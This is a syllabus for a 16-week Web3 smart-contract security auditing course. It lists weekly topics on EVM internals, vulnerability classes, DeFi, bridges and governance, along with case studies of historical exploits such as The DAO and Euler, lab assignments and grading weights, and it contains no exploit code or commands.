Web3 Security Mastery — 16-Week Roadmap

Instructor stance: Principal Web3 Security Engineer & Auditor Target learner: Developer with 1+ year of general programming experience → professional Web3 auditor Method: Primary sources (Ethereum/Solidity docs, EIPs) + audit firm research (Trail of Bits, ConsenSys Diligence, OpenZeppelin, Spearbit, ChainSecurity, Sigma Prime) + real post-mortems (Rekt, Immunefi, Code4rena, Sherlock) + hands-on Foundry labs that reproduce the exploit Output goal: After 16 weeks you can pick up an unknown protocol, scope it, threat-model it, find real bugs in it, write a professional report, and verify remediation.

Philosophy

"Auditors don't read code looking for bugs. They build a mental model of what the
 system is supposed to do, then look for the cases the developer didn't model.
 The exploit is always where the developer's mental model and the EVM's actual
 behavior diverge."

This course rejects three common bad habits:

“Tool-driven auditing” — running Slither and reporting whatever it says. Tools find low-hanging fruit; auditors find high-impact bugs that tools cannot reason about (economic, accounting, cross-protocol, design-level).
“Vulnerability checklist auditing” — scanning a known list of patterns. New protocols invent new bug classes faster than checklists are updated. A list is a floor, not a method.
“Read post-mortem, feel smart” — exploits are obvious in hindsight. Real skill is finding them before forge run says PASS. Every case study in this course is reproduced as a PoC you write yourself.

What we train instead:

System-level reasoning — read a protocol top-down, map trust boundaries, identify invariants, then look for state transitions that break them.
Tool fluency — Foundry, Slither, Echidna, Medusa, Halmos, Certora, Tenderly — each has a use case and a limit. Know both.
Economic + adversarial thinking — model the attacker’s capital, time, and access. A bug exploitable only with $1B of flash-loan liquidity that exists on mainnet is exploitable.
Professional output — scoping doc, threat model, finding write-ups, severity rationale, remediation review. Auditing is a service, not a hobby.

16-Week Overview

gantt
    title Web3 Security Mastery — 16 Weeks
    dateFormat  YYYY-MM-DD
    axisFormat  %b %d

    section Phase 1: Foundations
    Week 01 - Blockchain & Crypto Fundamentals  :d1, 2026-05-25, 7d
    Week 02 - Ethereum & EVM Deep Dive          :d2, after d1, 7d
    Week 03 - Solidity & Foundry Workflow       :d3, after d2, 7d

    section Phase 2: SC Security Core
    Week 04 - Security Foundations CEI/AC       :d4, after d3, 7d
    Week 05 - Vulnerability Classes Part 1      :d5, after d4, 7d
    Week 06 - Vulnerability Classes Part 2      :d6, after d5, 7d
    Week 07 - Token Standards Integration       :d7, after d6, 7d

    section Phase 3: Protocol & Economic
    Week 08 - DeFi Security                     :d8, after d7, 7d
    Week 09 - Oracle, MEV, Economic Attack      :d9, after d8, 7d
    Week 10 - Bridges & Cross-Chain             :d10, after d9, 7d
    Week 11 - L2, Rollups, Modular              :d11, after d10, 7d

    section Phase 4: Adjacent Surfaces
    Week 12 - Wallets & Account Abstraction     :d12, after d11, 7d
    Week 13 - Frontend, dApp, Infrastructure    :d13, after d12, 7d
    Week 14 - Governance & DAO                  :d14, after d13, 7d

    section Phase 5: Professional Practice
    Week 15 - Audit Methodology & Tooling       :d15, after d14, 7d
    Week 16 - Report Writing & Capstone         :d16, after d15, 7d

Phase 1: Foundations (Weeks 1–3)

You cannot audit what you cannot read at the byte and opcode level. These three weeks build the substrate.

Week	Topic	Goal	Lesson
01	Blockchain & Crypto Fundamentals	Distributed-ledger model, consensus (PoW/PoS), probabilistic vs deterministic finality, hash/signature/Merkle, ZK at conceptual level. Articulate which trust assumption underlies every Web3 component.	Tuan-01-Web3-Blockchain-Crypto-Fundamentals
02	Ethereum & EVM Deep Dive	Account model, transaction lifecycle (mempool → block → receipt), gas mechanics post-EIP-1559 & EIP-4844, EVM opcodes you’ll see in audits (CALL/STATICCALL/DELEGATECALL/CREATE2/SELFDESTRUCT), storage layout (slot math), calldata vs memory, ABI encoding, EIP roadmap awareness	Tuan-02-Ethereum-EVM-Deep-Dive
03	Solidity & Foundry Workflow	Solidity idioms (modifiers, custom errors, immutables, transient storage post-Cancun), inheritance, libraries, Foundry (`forge test`, `forge coverage`, `cast`, `anvil`, mainnet fork), CI for contracts	Tuan-03-Solidity-Foundry-Workflow

Phase 1 exit skills

Read a transaction trace and explain every CALL/SSTORE/LOG.
Compute the storage slot of any state variable (mapping included) by hand.
Write a Foundry test that forks mainnet, impersonates a whale, and asserts an invariant.
Explain why tx.origin is unsafe and what AA (ERC-4337) changes about that assumption.

Phase 2: Smart Contract Security Core (Weeks 4–7)

Every auditor builds a ‘mental vocabulary’ of vulnerability classes. The faster the pattern fires, the more bugs you find.

Week	Topic	Goal	Lesson
04	Security Foundations — CEI & AC	Checks-Effects-Interactions, access-control patterns (Ownable, AccessControl, role granularity), pull-over-push payment, input validation, custom-error gas/UX, storage-layout hazards in inheritance	Tuan-04-Security-Foundations-CEI-AC
05	Vulnerability Classes Part 1	Reentrancy (single / cross-function / cross-contract / read-only), unsafe external call (success not checked, return-data forge), `delegatecall` hazards, storage collision, uninitialized proxies, signature replay (cross-chain + cross-contract)	Tuan-05-Vulnerability-Classes-Part-1
06	Vulnerability Classes Part 2	Oracle manipulation (spot vs TWAP), MEV/front-running, insecure randomness (blockhash, Chainlink VRF correct usage), flash-loan attack flow, integer/rounding bugs (precision loss, off-by-one in conversion), DoS patterns, gas griefing	Tuan-06-Vulnerability-Classes-Part-2
07	Token Standards & Integration Risk	ERC-20 (`approve` race, `transfer` return-value differences), ERC-721/1155 callbacks, ERC-4626 inflation/donation attack, ERC-777 hook reentrancy, EIP-2612 `permit` & Permit2, weird tokens (fee-on-transfer, rebasing, deflationary, blacklist, multi-address)	Tuan-07-Token-Standards-Integration-Risk

Phase 2 exit skills

Given a contract, identify all external-call boundaries and apply CEI mentally.
Write reentrancy PoCs for all four reentrancy variants in Foundry.
Calculate storage slot collisions in an upgradeable proxy.
Build an ERC-4626 vault inflation-attack PoC and explain the donation invariant.

Phase 3: Protocol & Economic Security (Weeks 8–11)

This is where high-paying audits live. Bugs here are rarely a single line — they emerge from interaction between modules under adversarial economic conditions.

Week	Topic	Goal	Lesson
08	DeFi Security	Constant-product AMM math, concentrated-liquidity (Uniswap V3 math edges), lending protocol invariants (collateral factor, liquidation), liquidation incentive design, ERC-4626 vault accounting, stablecoin design (CDP / fractional / algorithmic), staking/restaking, perp funding-rate exploits	Tuan-08-DeFi-Security-AMM-Lending-Vault
09	Oracle, MEV & Economic Attack	Oracle architectures (push vs pull, on-chain vs off-chain), Chainlink Data Feed trust model, TWAP design and its manipulation cost, sandwich/back-run, MEV-Boost & PBS, private order flow (Flashbots Protect, MEV-Share), flash-loan-driven economic attack modeling	Tuan-09-Oracle-MEV-Economic-Attack
10	Bridges & Cross-Chain Security	Bridge taxonomy (lock-mint / burn-mint / liquidity / native asset), trust models (multisig / MPC / light client / ZK), message-layer protocols (LayerZero, Wormhole, CCIP, Hyperlane, Axelar) and their attestation models, finality assumption, replay protection, reorg handling	Tuan-10-Bridge-Cross-Chain-Security
11	L2, Rollups & Modular Blockchain	Optimistic rollups (OP Stack, Arbitrum Nitro), ZK rollups (zkSync Era, Scroll, Linea, Starknet, Polygon zkEVM), sequencer trust, fraud/validity proofs, data availability (calldata vs blob vs alt-DA), escape hatches, L1↔L2 messaging risk, shared sequencers (Espresso, Astria)	Tuan-11-L2-Rollup-Modular-Security

Phase 3 exit skills

Audit a constant-product AMM for reserve drainage and rounding bugs.
Model a flash-loan + oracle-manipulation attack on a lending protocol with numbers.
Critique a bridge design for trust assumption, replay, and finality risk.
Explain how an optimistic rollup’s fraud-proof window affects an auditor’s threat model.

Phase 4: Adjacent Attack Surfaces (Weeks 12–14)

The contract is one mile of the supply chain. The wallet, the frontend, the indexer, the governance multisig — all are in scope for a real audit.

Week	Topic	Goal	Lesson
12	Wallet, AA & Key Management	EOA vs smart wallet, Safe multisig (modules, guards, signing flow), MPC wallets, hardware wallet limits, session keys, ERC-4337 stack (UserOp, Bundler, EntryPoint, Paymaster), EIP-7702 set-code-tx implications, signature phishing, transaction simulation	Tuan-12-Wallet-AA-Key-Management
13	Frontend, dApp & Infrastructure	Wallet connection flow (EIP-1193, WalletConnect), approval drainer patterns, frontend supply-chain (npm, CDN, DNS, IPFS pinning), RPC trust (Infura/Alchemy/QuickNode public RPC), indexer/relayer/keeper risk, monitoring (Forta, Tenderly Alerts)	Tuan-13-Frontend-dApp-Infrastructure
14	Governance & DAO Security	Token-voting design, delegation, Compound Governor, OpenZeppelin Governor, Snapshot off-chain voting, timelocks, flash-loan governance attacks, multisig governance, emergency-pause patterns, parameter risk (oracle, fee, collateral factor)	Tuan-14-Governance-DAO-Security

Phase 4 exit skills

Review a Safe multisig configuration and identify weak threshold / signer hygiene issues.
Trace a wallet-drainer attack from phishing link → signed permit2 → drained tokens.
Critique a Governor + Timelock setup for flash-loan resilience and emergency response.

Phase 5: Professional Practice (Weeks 15–16)

Bugs found in private are worth zero. This phase converts your skill into deliverables clients pay for.

Week	Topic	Goal	Lesson
15	Audit Methodology & Tooling	Scoping, threat modeling (STRIDE adapted to Web3), trust-boundary mapping, invariant identification, Slither / Echidna / Medusa / Halmos / Certora workflows, manual review checklist, severity classification (Immunefi vs C4 vs Sherlock conventions), remediation review process	Tuan-15-Audit-Methodology-Tooling
16	Report Writing & Capstone	Audit report structure (Exec summary, Scope, Methodology, System overview, Findings, Severity matrix, Appendix), finding template (Description, Impact, PoC, Recommendation, Status), capstone audit project (~40h) on a multi-module protocol	Tuan-16-Report-Writing-Capstone

Phase 5 exit skills

Run a full audit workflow on an unknown codebase end-to-end.
Produce a polished audit report indistinguishable from a junior auditor at a top firm.
Defend severity assignments under push-back from the client.

Bonus Chapters (read when ready)

Deep dives and emerging-tech topics. No fixed order.

#	Topic	Goal	Lesson
Bonus-1	Non-EVM: Solana / Anchor	Account model, signer/owner checks, account confusion, Cross-Program Invocation (CPI) security, Anchor constraint patterns, sealevel runtime	Tuan-Bonus-Non-EVM-Solana
Bonus-2	Non-EVM: CosmWasm / Move	CosmWasm message passing, reply mechanics, Move resource model, Sui object ownership, Aptos verifier	Tuan-Bonus-Non-EVM-CosmWasm-Move
Bonus-3	Formal Verification Deep Dive	Certora CVL spec language, Halmos symbolic execution, K framework, hyper-properties, when formal verification beats fuzzing	Tuan-Bonus-Formal-Verification-Deep
Bonus-4	Fuzzing & Invariant Testing Advanced	Echidna config patterns, Medusa, Foundry invariant patterns (handler-based stateful fuzzing), shrinking, corpus management	Tuan-Bonus-Fuzzing-Invariant-Advanced
Bonus-5	ZK Circuit Security	Under-constrained bugs, soundness vs completeness, circom/halo2/noir, trusted setup risk, recursive proof composition, witness manipulation	Tuan-Bonus-ZK-Circuit-Security
Bonus-6	Stablecoin Economic Modeling	CDP (MakerDAO), algorithmic (failed UST), hybrid, depeg dynamics, liquidation cascades, oracle dependency, peg-defense mechanisms	Tuan-Bonus-Stablecoin-Economic-Modeling
Bonus-7	Liquid Staking & Restaking	LST design (Lido stETH, Rocket Pool rETH), EigenLayer restaking, AVS slashing, operator selection, dependency-tree risk for restakers	Tuan-Bonus-Liquid-Staking-Restaking
Bonus-8	Audit Competition Playbook	Code4rena / Sherlock / Cantina strategy, time allocation, finding write-up style that ranks, judging culture, leaderboard ROI math	Tuan-Bonus-Audit-Competition-Playbook
Bonus-9	Bug Bounty (Immunefi)	Severity scoring rubric, PoC packaging, responsible disclosure timeline, what protocols triage vs ignore, KYC / payout mechanics	Tuan-Bonus-Bug-Bounty-Immunefi

Case Studies (after Phase 3)

Every case study = a Foundry repo where you reproduce the exploit, then write the audit finding as if you caught it pre-exploit.

#	Case	Class	Lesson
01	The DAO (2016)	Reentrancy (original)	Case-The-DAO-Reentrancy-2016
02	Parity Multisig (2017)	Uninitialized contract + delegatecall	Case-Parity-Multisig-2017
03	bZx (2020)	Oracle manipulation + flash loan	Case-bZx-Price-Manipulation-2020
04	Harvest Finance (2020)	Curve pool manipulation	Case-Harvest-Finance-2020
05	Cream / Iron Bank (2021)	ERC-777 reentrancy	Case-Cream-Iron-Bank-2021
06	Poly Network (2021)	Cross-chain access control	Case-Poly-Network-2021
07	BadgerDAO (2021)	Frontend injection (Cloudflare Worker)	Case-BadgerDAO-Frontend-2021
08	Wormhole (2022)	Signature verification bypass	Case-Wormhole-2022
09	Ronin (2022)	Validator key compromise	Case-Ronin-Bridge-2022
10	Nomad (2022)	Initial-message replay	Case-Nomad-Bridge-2022
11	Beanstalk (2022)	Flash-loan governance	Case-Beanstalk-Governance-2022
12	Euler (2023)	Donation attack on accounting	Case-Euler-Finance-2023
13	Curve / Vyper (2023)	Compiler-level reentrancy lock bug	Case-Curve-Vyper-Compiler-2023
14	KyberSwap Elastic (2023)	Concentrated-liquidity math edge case	Case-KyberSwap-Elastic-2023
15	Mixin Network (2023)	Cloud key-storage compromise	Case-Mixin-Network-2023
16	Galxe (2023)	DNS hijack of frontend	Case-Galxe-Frontend-Hijack-2023
17	Radiant Capital (2024)	Owner key compromise via malware	Case-Radiant-Capital-2024
18	Penpie / Pendle (2024)	Reentrancy in reward accounting	Case-Penpie-Pendle-2024

Dependency Map between Weeks

graph LR
    W01[Wk 01<br>Crypto+Chain] --> W02[Wk 02<br>EVM]
    W02 --> W03[Wk 03<br>Solidity+Foundry]
    W03 --> W04[Wk 04<br>CEI/AC]
    W04 --> W05[Wk 05<br>Vuln 1]
    W05 --> W06[Wk 06<br>Vuln 2]
    W06 --> W07[Wk 07<br>Tokens]

    W07 --> W08[Wk 08<br>DeFi]
    W08 --> W09[Wk 09<br>Oracle/MEV]
    W08 --> W10[Wk 10<br>Bridges]
    W08 --> W11[Wk 11<br>L2]

    W05 --> W12[Wk 12<br>Wallet/AA]
    W12 --> W13[Wk 13<br>Frontend/Infra]
    W08 --> W14[Wk 14<br>Governance]

    W09 --> W15[Wk 15<br>Methodology]
    W10 --> W15
    W11 --> W15
    W13 --> W15
    W14 --> W15
    W15 --> W16[Wk 16<br>Report+Capstone]

    style W05 fill:#f9a825,stroke:#333,stroke-width:2px
    style W06 fill:#f9a825,stroke:#333,stroke-width:2px
    style W08 fill:#f9a825,stroke:#333,stroke-width:2px
    style W15 fill:#66bb6a,stroke:#333
    style W16 fill:#66bb6a,stroke:#333

Critical path: Weeks 05, 06, 08 (yellow) — the vulnerability backbone. Without these, the rest is theory. Weeks 15–16 (green) are deliverable training; everything before is input.

Alternative Study Plans

8-Week Intensive (40h/week, full-time)

Compress Phase 1 to 1 week (skip if you have EVM experience), pair Phase 2 weeks (2 per actual week), spend 2 weeks on Phase 3, 1 on Phase 4, 1 on Phase 5 + capstone. Recommended only for learners who already write Solidity.

12-Week Standard (25h/week)

The default plan above compressed by merging Wk 02+03 and Wk 13+14.

24-Week Part-Time (10h/week)

The 16-week plan extended: one lesson per 1.5 weeks, with the second half of the slow week dedicated to additional labs and one case-study reproduction.

Weekly Workflow

Read the lesson — Tuan-XX.md plus the linked primary sources. No skipping reading.
Set up the lab — Foundry repo, fork-mainnet config, mocked dependencies, etc.
Reproduce the vulnerability — write the PoC test that demonstrates the bug. forge test -vvvv until trace is intuitive.
Write a finding — pretend you caught the bug pre-exploit; write the audit finding into your finding journal.
Review against checklist — apply the master checklist; what would you have missed?
Optional: post the finding write-up to a personal blog or audit portfolio. Auditing is a portfolio profession.

Assessment System

Component	Weight	Form
Weekly quizzes (16 × 10 Qs)	15%	Multiple choice + short answer, ≥80% to pass each
Lab PoCs (one per week, ~32 total)	35%	Foundry test that demonstrates the vulnerability + passes `forge test`
Case-study reproductions (5 required)	15%	Full reproduction of historical exploit with finding write-up
Mid-course audit (after Week 8)	10%	20-hour mini-audit of a provided protocol; report graded against rubric
Capstone audit	25%	40-hour audit of a multi-module protocol (DeFi + governance + oracle); full report deliverable

Capstone rubric:

Coverage: every external function reviewed, every storage variable mapped (30%)
Findings: at least 3 valid Med+ findings (judged blind by reviewer with answer key) (30%)
Report quality: writing, formatting, severity rationale, PoCs (25%)
Threat model + invariant list quality (15%)

Commitment

The point of this course is not to make you a “Solidity expert” — that’s a developer goal, not an auditor goal. The point is to make you the engineer the protocol team trusts to sign off on a deploy.

When a $200M TVL launch is six weeks out, when the team’s lead dev is too close to the code to see the cliff, when the timelock is being set up for the first time — that’s when this skill cashes in.

16 weeks. One brick at a time. Built on EVM traces and PoCs, not vibes.

Last updated: 2026-05-16 See also: MOC-Web3-Security-Mastery · References

lthieu's notes

Explorer

Roadmap